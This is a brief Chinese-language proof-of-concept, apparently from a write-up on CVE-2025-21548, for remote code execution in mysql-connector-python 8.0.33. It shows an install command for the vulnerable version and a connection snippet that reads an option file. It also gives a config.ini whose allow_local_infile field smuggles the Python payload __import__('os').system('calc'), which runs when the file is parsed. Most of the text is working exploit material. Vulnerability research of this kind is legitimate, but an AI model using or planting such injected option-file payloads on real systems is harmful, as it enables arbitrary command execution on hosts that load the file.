手动测试一下。

```
python3 -m pip install --upgrade mysql-connector-python==8.0.33
```

```
import mysql.connector

opt_file = 'config.ini'
connection = mysql.connector.connect(
    read_default_file=opt_file,
    option_groups=["incorrect_config"]
)
```



```
[incorrect_config]

user=root
password=mypass
database=cpydata
port=int(3306)
allow_local_infile=__import__('os').system('calc')
```

![图片](CVE-2025-21548python%20version%20mysql%20rce.assets/640.png)